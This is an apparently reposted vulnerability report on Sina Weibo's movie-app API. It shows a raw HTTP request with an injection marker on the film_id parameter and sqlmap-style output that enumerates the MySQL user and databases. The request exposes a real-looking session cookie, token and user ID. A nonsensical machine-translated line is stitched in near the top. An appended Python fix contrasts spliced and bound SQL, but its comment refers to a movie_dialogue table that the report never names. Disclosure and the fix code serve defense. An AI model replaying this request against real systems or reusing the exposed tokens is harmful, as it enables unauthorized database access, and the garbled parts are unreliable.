Another SQL injection vulnerability in Sina Weibo
程序员文章站
2022-07-08 14:22:04
Beep, student card. Zhou Zhiruo has already cried herself faint in the bathroom.
POST https://ting.weibo.com/movieapp/dialogue/show HTTP/1.1
Host: ting.weibo.com
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Cookie: TING-G0-YF=61cb3ab25b54439455665d34a539fe7d; ua=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.__iPhone 6__os9.3.1__1.4.0
User-Agent: WeiboMovie/1.4.0 (iPhone; iOS 9.3.1; Scale/2.00)
Accept-Language: zh-Hans-US;q=1, en-US;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 231

action=dialogue%2Fshow&aid=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.&d_n=iPhone%206&film_id=178868*&from=8614093010&ip=100.77.76.179&os_n=iOS&os_v=9.3.1&token=2.00ddC5ZDcX6kGDfeab6c3adc0VbshD&uid=3271300273&v=1.4.0&wm=44995
Injectable parameter: film_id
back-end DBMS: MySQL 5
current user: '[email protected]%'
current database: 'musiclib'
back-end DBMS: MySQL 5
Database: musiclib [207 tables]
Database: information_schema [37 tables]
Solution:
NULL
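The report leaves the fix blank. As an added example (not Weibo's code, whose backend is not shown), the Python below contrasts the string-splicing pattern that produces a film_id injection with a hardened handler that whitelists the parameter as a plain integer and binds it. The movie_dialogue table and its columns are constructed assumptions, and SQLite stands in for the MySQL backend.

```python
import re
import sqlite3

# Constructed stand-in for the musiclib.movie_dialogue table named in the
# report; the column names are assumptions, the backend is SQLite in memory.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movie_dialogue (id INTEGER, film_id INTEGER, line TEXT)")
    conn.executemany("INSERT INTO movie_dialogue VALUES (?, ?, ?)", [
        (1, 178868, "line from film 178868"),
        (2, 178869, "line from a different film"),
    ])
    return conn

def show_dialogue_vulnerable(conn, raw_film_id):
    # Anti-pattern: the request parameter is spliced into the SQL text, so
    # anything that is not a bare number is parsed as SQL rather than as data.
    sql = "SELECT line FROM movie_dialogue WHERE film_id = " + raw_film_id
    return [row[0] for row in conn.execute(sql)]

FILM_ID_RE = re.compile(r"[0-9]{1,10}")

def is_valid_film_id(raw_film_id):
    # Whitelist check: film_id must be a plain decimal integer and nothing else.
    return FILM_ID_RE.fullmatch(raw_film_id) is not None

def show_dialogue_fixed(conn, raw_film_id):
    # Reject anything that is not a plain integer before touching the database,
    # then bind the value so the driver never interprets it as SQL text.
    if not is_valid_film_id(raw_film_id):
        raise ValueError("film_id must be a decimal integer")
    sql = "SELECT line FROM movie_dialogue WHERE film_id = ?"
    return [row[0] for row in conn.execute(sql, (int(raw_film_id),))]
```

A detection-side check follows from the same whitelist: any request to dialogue/show whose film_id fails the integer pattern (such as the sqlmap marker form 178868*) is worth logging and alerting on.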